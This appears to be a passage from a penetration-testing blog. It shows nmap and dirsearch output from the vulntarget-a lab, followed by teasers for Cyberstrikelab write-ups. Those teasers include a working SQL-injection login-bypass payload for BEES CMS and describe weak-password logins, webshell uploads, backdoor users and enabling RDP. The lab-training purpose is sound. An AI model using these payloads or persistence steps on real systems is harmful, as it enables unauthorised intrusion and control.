vulntarget-a

Nmap

[root@Hacking] /home/kali/vulntarget-a ❯ nmap 192.168.237.132 -A
PORT    STATE SERVICE      VERSION
80/tcp  open  http         nginx
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry
|_/
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:99:58:97 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:99:58:97 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-09-04T10:23:53+08:00
| smb2-time:
|   date: 2025-09-04T02:23:53
|_  start_date: 2025-09-04T02:22:36
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.237.132

Dirsearch

[root@Hacking] /home/kali/vulntarget-a ❯ dirsearch -u 'http://192.168.237.132/'

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.237.132/

[10:37:07] Scanning:
[10:37:08] 400 - 166B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:37:11] 301 - 178B - /api -> http://192.168.237.132/api/
[10:37:11] 403 - 564B - /api/
[10:37:11] 403 - 564B - /attachment.asp
[10:37:11] 403 - 564B - /attachment.aspx
[10:37:11] 403 - 564B - /attachment.jsp
[10:37:11] 403 - 564B - /attachment.html
[10:37:11] 403 - 564B - /attachment.htm
[10:37:11] 403 - 564B - /attachmentedit.asp
[10:37:11] 403 - 564B - /attachmentedit.aspx
[10:37:11] 403 - 564B - /attachmentedit.html
[10:37:11] 403 - 564B - /attachmentedit.jsp
[10:37:11] 403 - 564B - /attachmentedit.htm
[10:37:11] 403 - 564B - /attachments
[10:37:11] 403 - 564B - /attachments.aspx
[10:37:11] 403 - 564B - /attachments.jsp
[10:37:11] 403 - 564B - /attachments.html
[10:37:11] 403 - 564B - /attachments.htm
[10:37:11] 403 - 564B - /attachments.asp
[10:37:13] 200 - 894B - /favicon.ico
[10:37:13] 301 - 178B - /general -> http://192.168.237.132/general/
[10:37:14] 301 - 178B - /images -> http://192.168.237.132/./images/
[10:37:14] 403 - 564B - /./images/
[10:37:14] 403 - 564B - /./images/Sym.php
[10:37:14] 403 - 564B - /./images/c99.php
[10:37:14] 301 - 178B - /inc -> http://192.168.237.132/inc/
[10:37:14] 403 - 564B - /inc/
[10:37:14] 200 - 10KB - /index.php
[10:37:14] 400 - 166B - /index.php::$DATA
[10:37:14] 200 - 10KB - /index.php.
[10:37:14] 200 - 10KB - /index.pHp
[10:37:15] 301 - 178B - /mobile -> http://192.168.237.132/mobile/
[10:37:16] 301 - 178B - /portal -> http://192.168.237.132/portal/
[10:37:17] 200 - 26B - /robots.txt
[10:37:17] 301 - 178B - /share -> http://192.168.237.132/share/
[10:37:17] 200 - 0B - /share/
[10:37:17] 200 - 2KB - /portal/
[10:37:18] 301 - 178B - /static -> http://192.168.237.132/static/
[10:37:18] 301 - 178B - /static.. -> http://192.168.237.132/static/
[10:37:18] 403 - 564B - /templates/beez/index.php
[10:37:18] 403 - 564B - /templates/ja-helio-farsi/index.php
[10:37:18] 403 - 564B - /templates/rhuk_milkyway/index.php
[10:37:18] 400 - 166B - /Trace.axd::$DATA
[10:37:19] 400 - 166B - /web.config::$DATA
[10:37:19] 301 - 178B - /WebService -> http://192.168.237.132/WebService/

Task Completed

I changed the IP in the text below, because some tools don't work well on Kali ...

September 4, 2025 · 3 min · 1258 words · HYH

Cyberstrikelab-TengSnake

EmpireCMS

Going to port 80 reveals Empire CMS, version 7.5. /e/admin/index.php is the backend login page; log in with the weak credentials admin/admin and guess the auth code as cslab (at most five attempts, then a one-hour lockout, a bit of a trap). Upload a mod file ...

July 27, 2025 · 3 min · 1062 words · HYH

Cyberstrikelab-Lab5

BEES CMS

fscan found port 6582. After some searching, the username field of the backend login turned out to have SQL injection; a UNION injection forges the login:

user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0

Upload a file from the backend. The connection succeeded and flag1 was in the root directory. Brought it online in CS, enabled RDP, and added a backdoor user ...

July 20, 2025 · 1 min · 298 words · HYH

Cyberstrikelab-Lab4

BlueCMS

fscan found 192.168.10.10:5820 open, running BlueCMS v1.6. At the /admin login page, a weak-password login succeeded with admin/admin123456. Went to template management, edited the first template and captured the request, added a one-liner webshell, changed the file name, and the connection succeeded; flag1 was in the root directory. Already the highest privilege, so brought it straight online in CS, added a backdoor user and enabled RDP ...

July 19, 2025 · 1 min · 436 words · HYH